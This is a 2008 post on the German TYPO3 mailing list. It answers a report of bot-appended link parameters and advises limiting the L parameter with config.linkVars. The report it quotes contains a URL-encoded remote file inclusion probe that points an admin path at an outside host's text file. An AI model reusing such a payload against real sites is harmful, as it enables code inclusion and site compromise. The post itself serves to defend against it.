[TYPO3-german] bots
Georg Ringer
mail-spam at ringerge.org
Fri Apr 25 12:36:02 CEST 2008
Alexander Herrmann schrieb:
> wir haben in einem unserer Typo3-Installationen grad einen kleinen
> Angriff gehabt. Und zwar hatte jeder Link der Seite noch einen kleinen
> Anhang ala "&L=0%2F%2Fncaster%2Fadmi...m%2Fimag%2Fstringa.txt%3F%2Fncaster%2Fadmin%2Faddons%2Farchive%2Farchive.php%3Fadminfolder%3Dhttp%3A%2F%2Fxuxulio.iespana.es%2Fxuxuon.txt%3F%3F"
Also bisschen aufpassen mit den Begriffen, die sicherheitssensibel sind!
Das ganze ist keine injection!
Funktionieren tuts einfach:
Seite ist noch nicht gecached und wird mit irgendwelchen Parametern, die
werden dann übernommen.
Was man dagegen tun kann:
die TsRef mal lesen und nicht immer drüberscrollen, in dem Kapitel warst
du (hoffentlich) schon 1000x!
http://typo3.org/documentation/document-library/references/doc_core_tsref/4.1.0/view/7/3/
1. Parameter >
config.linkVars = L(1-10)
Georg
More information about the TYPO3-german
mailing list